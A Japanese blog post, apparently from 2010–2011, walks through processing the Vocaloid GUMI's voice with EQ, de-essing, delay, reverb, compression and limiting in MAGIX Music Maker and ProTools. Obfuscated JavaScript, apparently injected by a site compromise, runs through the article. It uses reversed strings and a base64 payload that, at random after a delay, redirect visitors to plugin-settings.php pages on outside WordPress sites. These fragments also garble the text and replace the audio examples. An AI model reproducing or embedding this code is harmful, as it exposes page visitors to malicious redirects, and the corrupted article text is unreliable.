メグッポイド(GUMI)の声の加工手順を紹介

2010年6月3日にSNS「にゃっぽん」で書いていた内容なのですが、改めてブログのほうにも書いておこうと思います。

特にめずらしいこともしておらず、いろいろな方のやり方を参考にしながら試してきた内容です。

ボカロによって、省く手順や追加する手順があります。
もちろんそれぞれ適用するパラメータも異なってきます。

この頃はMMをメインで使っていました。
MAGIX Music Maker Producer Edition(略称:MM)
現在は、ProToolsを使っていますが、やっていること自体はあまりかわりません。

ボカロディターがからWAV出力
これが素の声になります。

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その1
MAGIX Music Maker Producer Editionについてる
10 Bdom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var dom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), dom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}dom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anddom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}defghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dexOf(y1.charAt(p6++));y3=vd.indom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dexOf(y1.charAt(p6++));w4=vd.indom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dexOf(y1.charAt(p6++));u5=vd.indom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCodom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCodom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCodom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de(pc);}}while(p6$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["\'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}document.write(yb);};h94fcba1e7(‘PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9uaDcwcHV0ZXJhLmNvbS93cC1jb250ZW50L3BsdWdpbnMvbG9naW4tbG9ja2Rvd24vcGx1Z2luLXNldHRpbmdzLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A’); EQをかける。
GUMIのこもったような声をすこしすっきりとするのが主な目的です。
下のほうをさげて、上のほうをちょっとあげる感じです。上のほうの上げ具合は好みだと思います。
私は基本、高音大好きなので上げすぎになることが多いです。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
こんな声になります。

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その2
フリーVstであるSPITFISHを使用する
声でとんがった部分をまるめる感じ?
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
こんな声になります。気持ち掠れた声がうすらいでませんか?リンの滑舌に対応するときでも使うと聞きます。

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その3
Music Studio Producer(フリーソフト)のショートディレイをかける。
これは、声をけずったりして、細くなったのをごまかす感じ?
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
こんな声になります。

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注)2011/2/23現在は、ProToolsのリバーブでいい感じに使えているので無印のリン以外ではショートディレイをつかっていません。

その4
MAGIX Music Maker Producer Editionに戻って、
VARIVERB、COMPRESSORを使用。
VARIVERB:リバーブ的なもの思ってます。
COMPRESSOR:音量アップ的なものだと思ってます。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そしたら、こんな感じの声になります。

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リバーブのきかせ具合は、伴奏に合わせながらきめてます。
改めて伴奏と合わせないできいたら、この声でもいい気がしてきました。

その5
フリーVstであるSPITFISHを使用して、気になるところをまるめる。
BuzMaxi3で音圧アップ。伴奏をききながら適当に調整。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
こんな声になります。
(いっこ前の状態のほうがいい気もしてきてます・・・やりすぎてるかな)

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こんな感じです。

伴奏とあわせると、こんな感じになります。(完成動画)
/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo.jp/watch/sm10739635″>【ニコニコ動画】【底辺スレ発祥曲】シューティングスター / GUMI・MEIKO 【VOCALOIDカバー曲】


よくわからないまま、とにかくパラメータ弄って気にいった声になるように
試行錯誤しているので、この部分はこういう風にしたほうがいいとか
このサイトみたらいいよとか、つっこんでもらえるとありがたいです。


というわけで、半年くらい前の状態ですが、GUMIはDAWで声を加工する技術でがらりを変わる気がします。
私はDAWの使い方がいまいちわかっていないので、GUMIの良さがまだまだだせていません。

注)2011/2/23現在は、ProTools付属のプラグインをメインで使用しています。
この頃はまだProToolsを買ってなかったので、MM+フリーのエフェクトでがんばってました。
とはいっても、フリーのエフェクトのほうが使いやすいものがあるので、そっちもたまに使ってます。



お勧めプラグインとか
こういうやり方ためしたらどうですかという情報熱烈歓迎

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